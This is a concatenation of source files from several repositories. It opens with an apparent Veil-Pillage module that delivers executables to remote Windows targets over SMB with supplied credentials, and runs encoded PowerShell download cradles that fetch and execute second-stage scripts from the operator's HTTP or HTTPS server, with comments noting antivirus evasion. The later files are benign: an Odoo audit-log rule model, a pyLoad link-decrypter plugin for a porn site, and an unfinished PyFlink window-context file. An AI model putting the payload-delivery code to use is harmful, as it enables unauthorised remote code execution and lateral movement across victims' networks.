powershellTrigger() - trigger a download/execute of a powershell script from a particular powershell
powershellHostTrigger() - host a powershell script on a HTTP server and trigger a download/execute
"""
import os, time
from lib import helpers
from lib import smb
from lib import http
from lib import command_methods
import settings
def hostTrigger(targets, username, password, exePath, localHost, triggerMethod="wmis", exeArgs=""):
"""
Spins up an Impacket SMB server and hosts the binary specified by exePath.
The specified triggerMethod (default wmis) is then used to invoke a command
with the UNC path "\\localHost\\exe" which will invoke the specified
executable purely in memory.
Note: this evades several AV vendors, even with normally disk-detectable
executables #avlol :)
This takes 'targets' instead of a single 'target' since we don't want to set up
and tear down the local SMB server every time.
"""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# randomize the hosted .exe file name
hostedFileName = helpers.randomString() + ".exe"
# make the tmp hosting directory if it doesn't already exist
if not os.path.exists(settings.TEMP_DIR + "shared/"):
os.makedirs(settings.TEMP_DIR + "shared/")
# copy the payload to the random hostedFileName in the temp directory
os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/shared/" + hostedFileName)
# spin up the SMB server
server = smb.ThreadedSMBServer()
server.start()
time.sleep(.5)
# build the UNC path back to our host and executable and any specified arguments
cmd = "\\\\" + localHost + "\\system\\" + hostedFileName+" "+exeArgs
for target in targets:
# execute the UNC command for each target
command_methods.executeCommand(target, username, password, cmd, triggerMethod)
print helpers.color("\n [*] Giving time for commands to trigger...")
# sleep so the wmis/winexe commands can trigger and the target
# can grab the .exe from the SMB server
time.sleep(10)
# shut the smb server down
server.shutdown()
# remove the temporarily hosted files
os.system("rm -rf " + settings.TEMP_DIR+"/shared/")
# not sure if need to do this to kill off the smb server...
# os.kill(os.getpid(), signal.SIGINT) ?
# return the randomized name in the calling method later wants
# to clean the processes up
return hostedFileName
def uploadTrigger(targets, username, password, exePath, triggerMethod="wmis", exeArgs=""):
"""
Take a particular exe at "exePath" path and uploads it to each
target in targets, using the specified username and password.
The specified triggerMethod (default wmis) is then used to trigger the
uploaded executable.
"""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# randomize the uploaded .exe file name
uploadFileName = helpers.randomString() + ".exe"
# copy the payload to the random hostedFileName in the temp directory
os.system("cp "+exePath+" /"+settings.TEMP_DIR+"/"+uploadFileName)
# command to trigger the uploaded executable
cmd = "C:\\Windows\\Temp\\"+uploadFileName+" "+exeArgs
for target in targets:
# upload the binary to the host at C:\Windows\Temp\
smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", settings.TEMP_DIR+"/"+uploadFileName, 5)
# execute the trigger command
command_methods.executeCommand(target, username, password, cmd, triggerMethod)
# return the randomized name in the calling method later wants
# to clean the processes up
return uploadFileName
def powershellTrigger(targets, username, password, url, scriptArguments="", triggerMethod="wmis", outFile=None, noArch=False):
"""
Trigger a specific url to download a powershell script from.
url - the full url (http/https) to download the second stage script from
scriptArguments - the arguments to pass to the script we're invoking
outFile - if you want to the script to output to a file for later retrieval, put a path here
noArch - don't do the arch-independent launcher
"""
# this surpasses the length-limit implicit to smbexec I'm afraid :(
if triggerMethod.lower() == "smbexec":
print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
raw_input(" [*] press any key to return: ")
return ""
# if we get a single target, make it into a list
if type(targets) is str:
targets = [targets]
# if the url doesn't start with http/https, assume http
if not url.lower().startswith("http"):
url = "http://" + url
if scriptArguments.lower() == "none": scriptArguments = ""
# powershell command to download/execute our secondary stage,
# plus any scriptArguments we want to tack onto execution (i.e. PowerSploit)
# for https, be sure to turn off warnings for self-signed certs in case we're hosting
if url.lower().startswith("https"):
downloadCradle = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
else:
downloadCradle = "IEX (New-Object Net.WebClient).DownloadString('"+url+"');"+scriptArguments
# get the encoded powershell command
triggerCMD = helpers.encPowershell(downloadCradle, noArch=noArch)
# if we want to get output from the final execution, append it
if outFile: triggerCMD += " > " + outFile
# execute the powershell trigger command on each target
for target in targets:
print "\n [*] Executing command on "+target
out = command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod)
def powershellHostTrigger(targets, username, password, secondStage, lhost, scriptArguments="", triggerMethod="wmis", extraFiles=[], outFile=None, ssl=False, noArch=False):
"""
Hosts the 'secondaryStage' powershell script on a temporary web server,
and triggers the "IEX (New-Object Net.WebClient).DownloadString(...)" cradle
to download and invoke the secondStage.
Inspiration from http://www.pentestgeek.com/2013/09/18/invoke-shellcode/
lhost - local host IP to trigger the secondary stage from
secondStage - path to a secondary Powershell payload stage
scriptArguments - additional powershell command to run right after the secondStage download
i.e. for PowerSploit arguments
extraFiles - additional files to host (i.e. an exe)
outFile - if you want to retrieve the results of the final execution
ssl - use https/ssl for the trigger
noArch - don't do the arch-independent launcher
Inspiration from http://www.pentestgeek.com/2013/09/18/invoke-shellcode/
"""
# this surpasses the length-limit implicit to smbexec I'm afraid :(
if triggerMethod.lower() == "smbexec":
print helpers.color("\n\n [!] Error: smbexec will not work with powershell invocation",warning=True)
raw_input(" [*] press any key to return: ")
return ""
# sanity check that the second powershell stage actually exists
if not os.path.exists(secondStage):
print helpers.color("\n\n [!] Error: second powershell stage '"+secondStage+"' doesn't exist!", warning=True)
raw_input(" [*] press any key to return: ")
return ""
# translate string to boolean for ssl
if ssl and isinstance(ssl, str):
if ssl.lower()=="true": ssl = True
else: ssl = False
# get a randomized name for our second stage
secondStageName = helpers.randomString()
# if we're using ssl/https to host, throw in the self-signed cert
# note: this also cleanr out the host directory, /tmp/pillage/ !
if ssl:
certPath = settings.VEIL_PILLAGE_PATH + "/data/misc/key.pem"
# create our Veil HTTPS server for serving /tmp/pillage/
server = http.VeilHTTPServer(port=443, cert=certPath)
# append https to the local host
url = "https://" + lhost + "/" + secondStageName
else:
# create our Veil HTTP server for serving /tmp/pillage/
server = http.VeilHTTPServer()
url = "http://" + lhost + "/" + secondStageName
# copy the second stage into the randomized name in /tmp/pillage/
os.system("cp " + secondStage + " /tmp/pillage/"+secondStageName)
# start the http server up
server.start()
time.sleep(.5)
# copy in any extra files to host (i.e. if we're doing remote reflective exe invocation or something)
for f in extraFiles:
if not os.path.exists(secondStage):
print helpers.color(" [!] Error: addtional file '"+f+"' doesn't exist!", warning=True)
else:
os.system("cp " + f + " /tmp/pillage/")
# call the general powershell trigger method with the appropriate url
powershellTrigger(targets, username, password, url, scriptArguments, triggerMethod, outFile, noArch)
# pause for a bit, and the shut the server down
print helpers.color("\n [*] Giving time for commands to trigger...")
time.sleep(10)
server.shutdown()
|
lynndotconfig/server-tools | refs/heads/8.0 | auditlog/models/rule.py | 7 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 ABF OSIELL (<http://osiell.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import models, fields, api, modules, _, SUPERUSER_ID, sql_db
FIELDS_BLACKLIST = [
'id', 'create_uid', 'create_date', 'write_uid', 'write_date',
'display_name', '__last_update',
]
# Used for performance, to avoid a dictionary instanciation when we need an
# empty dict to simplify algorithms
EMPTY_DICT = {}
class DictDiffer(object):
"""Calculate the difference between two dictionaries as:
(1) items added
(2) items removed
(3) keys same in both but changed values
(4) keys same in both and unchanged values
"""
def __init__(self, current_dict, past_dict):
self.current_dict, self.past_dict = current_dict, past_dict
self.set_current = set(current_dict)
self.set_past = set(past_dict)
self.intersect = self.set_current.intersection(self.set_past)
def added(self):
return self.set_current - self.intersect
def removed(self):
return self.set_past - self.intersect
def changed(self):
return set(o for o in self.intersect
if self.past_dict[o] != self.current_dict[o])
def unchanged(self):
return set(o for o in self.intersect
if self.past_dict[o] == self.current_dict[o])
class auditlog_rule(models.Model):
_name = 'auditlog.rule'
_description = "Auditlog - Rule"
name = fields.Char(u"Name", size=32, required=True)
model_id = fields.Many2one(
'ir.model', u"Model", required=True,
help=u"Select model for which you want to generate log.")
user_ids = fields.Many2many(
'res.users',
'audittail_rules_users',
'user_id', 'rule_id',
string=u"Users",
help=u"if User is not added then it will applicable for all users")
log_read = fields.Boolean(
u"Log Reads",
help=(u"Select this if you want to keep track of read/open on any "
u"record of the model of this rule"))
log_write = fields.Boolean(
u"Log Writes", default=True,
help=(u"Select this if you want to keep track of modification on any "
u"record of the model of this rule"))
log_unlink = fields.Boolean(
u"Log Deletes", default=True,
help=(u"Select this if you want to keep track of deletion on any "
u"record of the model of this rule"))
log_create = fields.Boolean(
u"Log Creates", default=True,
help=(u"Select this if you want to keep track of creation on any "
u"record of the model of this rule"))
# log_action = fields.Boolean(
# "Log Action",
# help=("Select this if you want to keep track of actions on the "
# "model of this rule"))
# log_workflow = fields.Boolean(
# "Log Workflow",
# help=("Select this if you want to keep track of workflow on any "
# "record of the model of this rule"))
state = fields.Selection(
[('draft', "Draft"), ('subscribed', "Subscribed")],
string=u"State", required=True, default='draft')
action_id = fields.Many2one(
'ir.actions.act_window', string="Action")
_sql_constraints = [
('model_uniq', 'unique(model_id)',
("There is already a rule defined on this model\n"
"You cannot define another: please edit the existing one."))
]
def _register_hook(self, cr, ids=None):
"""Get all rules and apply them to log method calls."""
super(auditlog_rule, self)._register_hook(cr)
if not hasattr(self.pool, '_auditlog_field_cache'):
self.pool._auditlog_field_cache = {}
if not hasattr(self.pool, '_auditlog_model_cache'):
self.pool._auditlog_model_cache = {}
if ids is None:
ids = self.search(cr, SUPERUSER_ID, [('state', '=', 'subscribed')])
return self._patch_methods(cr, SUPERUSER_ID, ids)
@api.multi
def _patch_methods(self):
"""Patch ORM methods of models defined in rules to log their calls."""
updated = False
model_cache = self.pool._auditlog_model_cache
for rule in self:
if rule.state != 'subscribed':
continue
if not self.pool.get(rule.model_id.model):
# ignore rules for models not loadable currently
continue
model_cache[rule.model_id.model] = rule.model_id.id
model_model = self.env[rule.model_id.model]
# CRUD
# -> create
check_attr = 'auditlog_ruled_create'
if getattr(rule, 'log_create') \
and not hasattr(model_model, check_attr):
model_model._patch_method('create', self._make_create())
setattr(model_model, check_attr, True)
updated = True
# -> read
check_attr = 'auditlog_ruled_read'
if getattr(rule, 'log_read') \
and not hasattr(model_model, check_attr):
model_model._patch_method('read', self._make_read())
setattr(model_model, check_attr, True)
updated = True
# -> write
check_attr = 'auditlog_ruled_write'
if getattr(rule, 'log_write') \
and not hasattr(model_model, check_attr):
model_model._patch_method('write', self._make_write())
setattr(model_model, check_attr, True)
updated = True
# -> unlink
check_attr = 'auditlog_ruled_unlink'
if getattr(rule, 'log_unlink') \
and not hasattr(model_model, check_attr):
model_model._patch_method('unlink', self._make_unlink())
setattr(model_model, check_attr, True)
updated = True
return updated
@api.multi
def _revert_methods(self):
"""Restore original ORM methods of models defined in rules."""
updated = False
for rule in self:
model_model = self.env[rule.model_id.model]
for method in ['create', 'read', 'write', 'unlink']:
if getattr(rule, 'log_%s' % method) and hasattr(
getattr(model_model, method), 'origin'):
model_model._revert_method(method)
updated = True
if updated:
modules.registry.RegistryManager.signal_registry_change(
self.env.cr.dbname)
# Unable to find a way to declare the `create` method with the new API,
# errors occurs with the `_register_hook()` BaseModel method.
def create(self, cr, uid, vals, context=None):
"""Update the registry when a new rule is created."""
res_id = super(auditlog_rule, self).create(
cr, uid, vals, context=context)
if self._register_hook(cr, [res_id]):
modules.registry.RegistryManager.signal_registry_change(cr.dbname)
return res_id
# Unable to find a way to declare the `write` method with the new API,
# errors occurs with the `_register_hook()` BaseModel method.
def write(self, cr, uid, ids, vals, context=None):
"""Update the registry when existing rules are updated."""
if isinstance(ids, (int, long)):
ids = [ids]
super(auditlog_rule, self).write(cr, uid, ids, vals, context=context)
if self._register_hook(cr, ids):
modules.registry.RegistryManager.signal_registry_change(cr.dbname)
return True
@api.multi
def unlink(self):
"""Unsubscribe rules before removing them."""
self.unsubscribe()
return super(auditlog_rule, self).unlink()
def _make_create(self):
"""Instanciate a create method that log its calls."""
@api.model
@api.returns('self', lambda value: value.id)
def create(self, vals, **kwargs):
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
new_record = create.origin(self, vals, **kwargs)
new_values = dict(
(d['id'], d) for d in new_record.sudo().read(
list(self._fields)))
rule_model.sudo().create_logs(
self.env.uid, self._name, new_record.ids,
'create', None, new_values)
return new_record
return create
def _make_read(self):
"""Instanciate a read method that log its calls."""
def read(self, *args, **kwargs):
result = read.origin(self, *args, **kwargs)
# Sometimes the result is not a list but a dictionary
# Also, we can not modify the current result as it will break calls
result2 = result
if not isinstance(result2, list):
result2 = [result]
read_values = dict((d['id'], d) for d in result2)
# Old API
if args and isinstance(args[0], sql_db.Cursor):
cr, uid, ids = args[0], args[1], args[2]
if isinstance(ids, (int, long)):
ids = [ids]
# If the call came from auditlog itself, skip logging:
# avoid logs on `read` produced by auditlog during internal
# processing: read data of relevant records, 'ir.model',
# 'ir.model.fields'... (no interest in logging such operations)
if kwargs.get('context', {}).get('auditlog_disabled'):
return result
env = api.Environment(cr, uid, {'auditlog_disabled': True})
rule_model = env['auditlog.rule']
rule_model.sudo().create_logs(
env.uid, self._name, ids,
'read', read_values)
# New API
else:
# If the call came from auditlog itself, skip logging:
# avoid logs on `read` produced by auditlog during internal
# processing: read data of relevant records, 'ir.model',
# 'ir.model.fields'... (no interest in logging such operations)
if self.env.context.get('auditlog_disabled'):
return result
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
rule_model.sudo().create_logs(
self.env.uid, self._name, self.ids,
'read', read_values)
return result
return read
def _make_write(self):
"""Instanciate a write method that log its calls."""
@api.multi
def write(self, vals, **kwargs):
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
old_values = dict(
(d['id'], d) for d in self.sudo().read(list(self._fields)))
result = write.origin(self, vals, **kwargs)
new_values = dict(
(d['id'], d) for d in self.sudo().read(list(self._fields)))
rule_model.sudo().create_logs(
self.env.uid, self._name, self.ids,
'write', old_values, new_values)
return result
return write
def _make_unlink(self):
"""Instanciate an unlink method that log its calls."""
@api.multi
def unlink(self, **kwargs):
self = self.with_context(auditlog_disabled=True)
rule_model = self.env['auditlog.rule']
old_values = dict(
(d['id'], d) for d in self.sudo().read(list(self._fields)))
rule_model.sudo().create_logs(
self.env.uid, self._name, self.ids, 'unlink', old_values)
return unlink.origin(self, **kwargs)
return unlink
def create_logs(self, uid, res_model, res_ids, method,
old_values=None, new_values=None,
additional_log_values=None):
"""Create logs. `old_values` and `new_values` are dictionnaries, e.g:
{RES_ID: {'FIELD': VALUE, ...}}
"""
if old_values is None:
old_values = EMPTY_DICT
if new_values is None:
new_values = EMPTY_DICT
log_model = self.env['auditlog.log']
for res_id in res_ids:
model_model = self.env[res_model]
name = model_model.browse(res_id).name_get()
res_name = name and name[0] and name[0][1]
vals = {
'name': res_name,
'model_id': self.pool._auditlog_model_cache[res_model],
'res_id': res_id,
'method': method,
'user_id': uid,
}
vals.update(additional_log_values or {})
log = log_model.create(vals)
diff = DictDiffer(
new_values.get(res_id, EMPTY_DICT),
old_values.get(res_id, EMPTY_DICT))
if method is 'create':
self._create_log_line_on_create(log, diff.added(), new_values)
elif method is 'read':
self._create_log_line_on_read(
log, old_values.get(res_id, EMPTY_DICT).keys(), old_values)
elif method is 'write':
self._create_log_line_on_write(
log, diff.changed(), old_values, new_values)
def _get_field(self, model, field_name):
cache = self.pool._auditlog_field_cache
if field_name not in cache.get(model.model, {}):
cache.setdefault(model.model, {})
# - we use 'search()' then 'read()' instead of the 'search_read()'
# to take advantage of the 'classic_write' loading
# - search the field in the current model and those it inherits
field_model = self.env['ir.model.fields']
all_model_ids = [model.id]
all_model_ids.extend(model.inherited_model_ids.ids)
field = field_model.search(
[('model_id', 'in', all_model_ids), ('name', '=', field_name)])
# The field can be a dummy one, like 'in_group_X' on 'res.users'
# As such we can't log it (field_id is required to create a log)
if not field:
cache[model.model][field_name] = False
else:
field_data = field.read(load='_classic_write')[0]
cache[model.model][field_name] = field_data
return cache[model.model][field_name]
def _create_log_line_on_read(
self, log, fields_list, read_values):
"""Log field filled on a 'read' operation."""
log_line_model = self.env['auditlog.log.line']
for field_name in fields_list:
if field_name in FIELDS_BLACKLIST:
continue
field = self._get_field(log.model_id, field_name)
# not all fields have an ir.models.field entry (ie. related fields)
if field:
log_vals = self._prepare_log_line_vals_on_read(
log, field, read_values)
log_line_model.create(log_vals)
def _prepare_log_line_vals_on_read(self, log, field, read_values):
"""Prepare the dictionary of values used to create a log line on a
'read' operation.
"""
vals = {
'field_id': field['id'],
'log_id': log.id,
'old_value': read_values[log.res_id][field['name']],
'old_value_text': read_values[log.res_id][field['name']],
'new_value': False,
'new_value_text': False,
}
if field['relation'] and '2many' in field['ttype']:
old_value_text = self.env[field['relation']].browse(
vals['old_value']).name_get()
vals['old_value_text'] = old_value_text
return vals
def _create_log_line_on_write(
self, log, fields_list, old_values, new_values):
"""Log field updated on a 'write' operation."""
log_line_model = self.env['auditlog.log.line']
for field_name in fields_list:
if field_name in FIELDS_BLACKLIST:
continue
field = self._get_field(log.model_id, field_name)
# not all fields have an ir.models.field entry (ie. related fields)
if field:
log_vals = self._prepare_log_line_vals_on_write(
log, field, old_values, new_values)
log_line_model.create(log_vals)
def _prepare_log_line_vals_on_write(
self, log, field, old_values, new_values):
"""Prepare the dictionary of values used to create a log line on a
'write' operation.
"""
vals = {
'field_id': field['id'],
'log_id': log.id,
'old_value': old_values[log.res_id][field['name']],
'old_value_text': old_values[log.res_id][field['name']],
'new_value': new_values[log.res_id][field['name']],
'new_value_text': new_values[log.res_id][field['name']],
}
# for *2many fields, log the name_get
if field['relation'] and '2many' in field['ttype']:
# Filter IDs to prevent a 'name_get()' call on deleted resources
existing_ids = self.env[field['relation']]._search(
[('id', 'in', vals['old_value'])])
old_value_text = []
if existing_ids:
existing_values = self.env[field['relation']].browse(
existing_ids).name_get()
old_value_text.extend(existing_values)
# Deleted resources will have a 'DELETED' text representation
deleted_ids = set(vals['old_value']) - set(existing_ids)
for deleted_id in deleted_ids:
old_value_text.append((deleted_id, 'DELETED'))
vals['old_value_text'] = old_value_text
new_value_text = self.env[field['relation']].browse(
vals['new_value']).name_get()
vals['new_value_text'] = new_value_text
return vals
def _create_log_line_on_create(
self, log, fields_list, new_values):
"""Log field filled on a 'create' operation."""
log_line_model = self.env['auditlog.log.line']
for field_name in fields_list:
if field_name in FIELDS_BLACKLIST:
continue
field = self._get_field(log.model_id, field_name)
# not all fields have an ir.models.field entry (ie. related fields)
if field:
log_vals = self._prepare_log_line_vals_on_create(
log, field, new_values)
log_line_model.create(log_vals)
def _prepare_log_line_vals_on_create(self, log, field, new_values):
"""Prepare the dictionary of values used to create a log line on a
'create' operation.
"""
vals = {
'field_id': field['id'],
'log_id': log.id,
'old_value': False,
'old_value_text': False,
'new_value': new_values[log.res_id][field['name']],
'new_value_text': new_values[log.res_id][field['name']],
}
if field['relation'] and '2many' in field['ttype']:
new_value_text = self.env[field['relation']].browse(
vals['new_value']).name_get()
vals['new_value_text'] = new_value_text
return vals
@api.multi
def subscribe(self):
"""Subscribe Rule for auditing changes on model and apply shortcut
to view logs on that model.
"""
act_window_model = self.env['ir.actions.act_window']
model_data_model = self.env['ir.model.data']
for rule in self:
# Create a shortcut to view logs
domain = "[('model_id', '=', %s), ('res_id', '=', active_id)]" % (
rule.model_id.id)
vals = {
'name': _(u"View logs"),
'res_model': 'auditlog.log',
'src_model': rule.model_id.model,
'domain': domain,
}
act_window = act_window_model.sudo().create(vals)
rule.write({'state': 'subscribed', 'action_id': act_window.id})
keyword = 'client_action_relate'
value = 'ir.actions.act_window,%s' % act_window.id
model_data_model.sudo().ir_set(
'action', keyword, 'View_log_' + rule.model_id.model,
[rule.model_id.model], value, replace=True,
isobject=True, xml_id=False)
return True
@api.multi
def unsubscribe(self):
"""Unsubscribe Auditing Rule on model."""
act_window_model = self.env['ir.actions.act_window']
ir_values_model = self.env['ir.values']
# Revert patched methods
self._revert_methods()
for rule in self:
# Remove the shortcut to view logs
act_window = act_window_model.search(
[('name', '=', 'View Log'),
('res_model', '=', 'auditlog.log'),
('src_model', '=', rule.model_id.model)])
if act_window:
value = 'ir.actions.act_window,%s' % act_window.id
act_window.unlink()
ir_value = ir_values_model.search(
[('model', '=', rule.model_id.model),
('value', '=', value)])
if ir_value:
ir_value.unlink()
self.write({'state': 'draft'})
return True
|
synweap15/pyload | refs/heads/stable | module/plugins/crypter/SexuriaCom.py | 11 | # -*- coding: utf-8 -*-
import re
from module.plugins.internal.Crypter import Crypter
class SexuriaCom(Crypter):
__name__ = "SexuriaCom"
__type__ = "crypter"
__version__ = "0.10"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?sexuria\.com/(v1/)?(Pornos_Kostenlos_.+?_(\d+)\.html|dl_links_\d+_\d+\.html|id=\d+\&part=\d+\&link=\d+)'
__config__ = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_package", "bool", "Create a subfolder for each package", True)]
__description__ = """Sexuria.com decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("NETHead", "NETHead.AT.gmx.DOT.net")]
#: Constants
PATTERN_SUPPORTED_MAIN = r'http://(www\.)?sexuria\.com/(v1/)?Pornos_Kostenlos_.+?_(\d+)\.html'
PATTERN_SUPPORTED_CRYPT = r'http://(www\.)?sexuria\.com/(v1/)?dl_links_\d+_(?P<ID>\d+)\.html'
PATTERN_SUPPORTED_REDIRECT = r'http://(www\.)?sexuria\.com/out\.php\?id=(?P<ID>\d+)\&part=\d+\&link=\d+'
PATTERN_TITLE = r'<title> - (?P<TITLE>.*) Sexuria - Kostenlose Pornos - Rapidshare XXX Porn</title>'
PATTERN_PASSWORD = r'<strong>Passwort: </strong></div></td>.*?bgcolor="#EFEFEF">(?P<PWD>.*?)</td>'
PATTERN_DL_LINK_PAGE = r'"(dl_links_\d+_\d+\.html)"'
PATTERN_REDIRECT_LINKS = r'value="(http://sexuria\.com/out\.php\?id=\d+\&part=\d+\&link=\d+)" readonly'
LIST_PWDIGNORE = ["Kein Passwort", "-"]
def decrypt(self, pyfile):
#: Init
self.pyfile = pyfile
self.package = pyfile.package()
#: Decrypt and add links
package_name, self.links, folder_name, package_pwd = self.decrypt_links(self.pyfile.url)
if package_pwd:
self.pyfile.package().password = package_pwd
self.packages = [(package_name, self.links, folder_name)]
def decrypt_links(self, url):
linklist = []
name = self.package.name
folder = self.package.folder
password = None
if re.match(self.PATTERN_SUPPORTED_MAIN, url, re.I):
#: Processing main page
html = self.load(url)
links = re.findall(self.PATTERN_DL_LINK_PAGE, html, re.I)
for link in links:
linklist.append("http://sexuria.com/v1/" + link)
elif re.match(self.PATTERN_SUPPORTED_REDIRECT, url, re.I):
#: Processing direct redirect link (out.php), redirecting to main page
id = re.search(self.PATTERN_SUPPORTED_REDIRECT, url, re.I).group('ID')
if id:
linklist.append("http://sexuria.com/v1/Pornos_Kostenlos_liebe_%s.html" % id)
elif re.match(self.PATTERN_SUPPORTED_CRYPT, url, re.I):
#: Extract info from main file
id = re.search(self.PATTERN_SUPPORTED_CRYPT, url, re.I).group('ID')
html = self.load("http://sexuria.com/v1/Pornos_Kostenlos_info_%s.html" % id)
#: Webpage title / Package name
titledata = re.search(self.PATTERN_TITLE, html, re.I)
if not titledata:
self.log_warning("No title data found, has site changed?")
else:
title = titledata.group('TITLE').strip()
if title:
name = folder = title
self.log_debug("Package info found, name [%s] and folder [%s]" % (name, folder))
#: Password
pwddata = re.search(self.PATTERN_PASSWORD, html, re.I | re.S)
if not pwddata:
self.log_warning("No password data found, has site changed?")
else:
pwd = pwddata.group('PWD').strip()
if pwd and not (pwd in self.LIST_PWDIGNORE):
password = pwd
self.log_debug("Package info found, password [%s]" % password)
#: Process links (dl_link)
html = self.load(url)
links = re.findall(self.PATTERN_REDIRECT_LINKS, html, re.I)
if not links:
self.log_error(_("Broken for link: %s") % link)
else:
for link in links:
link = link.replace("http://sexuria.com/", "http://www.sexuria.com/")
finallink = self.load(link, just_header=True)['location']
if not finallink or ("sexuria.com/" in finallink):
self.log_error(_("Broken for link: %s") % link)
else:
linklist.append(finallink)
#: Log result
if not linklist:
self.fail(_("Unable to extract links (maybe plugin out of date?)"))
else:
for i, link in enumerate(linklist):
self.log_debug("Supported link %d/%d: %s" % (i+1, len(linklist), link))
#: All done, return to caller
return name, linklist, folder, password
|
yangdw/PyRepo | refs/heads/master | src/repo/extension-lib/__init__.py | 70 | # coding:utf-8
|
godfreyhe/flink | refs/heads/master | flink-python/pyflink/fn_execution/table/window_context.py | 9 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import sys
from abc import ABC, abstractmethod
from typing import Generic, TypeVar, List, Iterable
from apache_beam.coders import Coder, PickleCoder
from pyflink.datastream.state import StateDescriptor, State, ValueStateDescriptor, \
ListStateDescriptor, MapStateDescriptor
from pyflink.datastream.timerservice import InternalTimerService
from pyflink.datastream.window import TimeWindow, CountWindow
from pyflink.fn_execution.timerservice_impl import InternalTimerServiceImpl
from pyflink.fn_execution.internal_state import InternalMergingState
from pyflink.fn_execution.state_impl import RemoteKeyedStateBackend
MAX_LONG_VALUE = sys.maxsize
K = TypeVar('K')
W = TypeVar('W', TimeWindow, CountWindow)
class Context(Generic[K, W], ABC):
"""
Information available in an invocation of methods of InternalWindowProcessFunction.
"""
@abstractmethod
def get_partitioned_state(self, state_descriptor: StateDescriptor) -> State:
"""
Creates a partitioned state handle, using the state backend configured for this task.
"""
pass
@abstractmethod
def current_key(self) -> K:
"""
Returns current key of current processed element.
"""
pass
@abstractmethod
def current_processing_time(self) -> int:
"""
Returns the current processing time.
"""
pass
@abstractmethod
def current_watermark(self) -> int:
"""
Returns the current event-time watermark.
"""
pass
@abstractmethod
def get_window_accumulators(self, window: W) -> List:
"""
Gets the accumulators of the given window.
"""
pass
@abstractmethod
def set_window_accumulators(self, window: W, acc: List):
"""
Sets the accumulators of the given window.
"""
pass
@abstractmethod
def clear_window_state(self, window: W):
"""
Clear window state of the given window.
"""
pass
@abstractmethod
def clear_trigger(self, window: W):
"""
Call Trigger#clear(Window) on trigger.
"""
pass
@abstractmethod
def on_merge(self, new_window: W, merged_windows: Iterable[W]):
"""
Call Trigger.on_merge() on trigger.
"""
pass
@abstractmethod
def delete_cleanup_timer(self, window: W):
"""
Deletes the cleanup timer set for the contents of the provided window.
"""
pass
class WindowContext(Context[K, W]):
"""
Context of window.
"""
def __init__(self,
window_operator,
trigger_context: 'TriggerContext',
state_backend: RemoteKeyedStateBackend,
state_value_coder: Coder,
timer_service: InternalTimerServiceImpl,
is_event_time: bool):
self._window_operator = window_operator
self._trigger_context = trigger_context
self._state_backend = state_backend
self.timer_service = timer_service
self.is_event_time = is_event_time
self.window_state = self._state_backend.get_value_state("window_state", state_value_coder)
def get_partitioned_state(self, state_descriptor: StateDescriptor) -> State:
return self._trigger_context.get_partitioned_state(state_descriptor)
def current_key(self) -> K:
return self._state_backend.get_current_key()
def current_processing_time(self) -> int:
return self.timer_service.current_processing_time()
def current_watermark(self) -> int:
return self.timer_service.current_watermark()
def get_window_accumulators(self, window: W) -> List:
self.window_state.set_current_namespace(window)
return self.window_state.value()
def set_window_accumulators(self, window: W, acc: List):
self.window_state.set_current_namespace(window)
self.window_state.update(acc)
def clear_window_state(self, window: W):
self.window_state.set_current_namespace(window)
self.window_state.clear()
def clear_trigger(self, window: W):
self._trigger_context.window = window
self._trigger_context.clear()
def on_merge(self, new_window: W, merged_windows: Iterable[W]):
self._trigger_context.window = new_window
self._trigger_context.merged_windows = merged_windows
self._trigger_context.on_merge()
def delete_cleanup_timer(self, window: W):
cleanup_time = self._window_operator.cleanup_time(window)
if cleanup_time == MAX_LONG_VALUE:
# no need to clean up because we didn't set one
return
if self.is_event_time:
self._trigger_context.delete_event_time_timer(cleanup_time)
else:
self._trigger_context.delete_processing_time_timer(cleanup_time)
class TriggerContext(object):
"""
TriggerContext is a utility for handling Trigger invocations. It can be reused by setting the
key and window fields. No internal state must be kept in the TriggerContext.
"""
def __init__(self,
trigger,
timer_service: InternalTimerService[W],
state_backend: RemoteKeyedStateBackend):
self._trigger = trigger
self._timer_service = timer_service
self._state_backend = state_backend
self.window = None # type: W
self.merged_windows = None # type: Iterable[W]
def open(self):
self._trigger.open(self)
def on_element(self, row, timestamp: int) -> bool:
return self._trigger.on_element(row, timestamp, self.window)
def on_processing_time(self, timestamp: int) -> bool:
return self._trigger.on_processing_time(timestamp, self.window)
def on_event_time(self, timestamp: int) -> bool:
return self._trigger.on_event_time(timestamp, self.window)
def on_merge(self):
self._trigger.on_merge(self.window, self)
def get_current_processing_time(self) -> int:
return self._timer_service.current_processing_time()
def get_current_watermark(self) -> int:
return self._timer_service.current_watermark()
def register_processing_time_timer(self, time: int):
self._timer_service.register_processing_time_timer(self.window, time)
def register_event_time_timer(self, time: int):
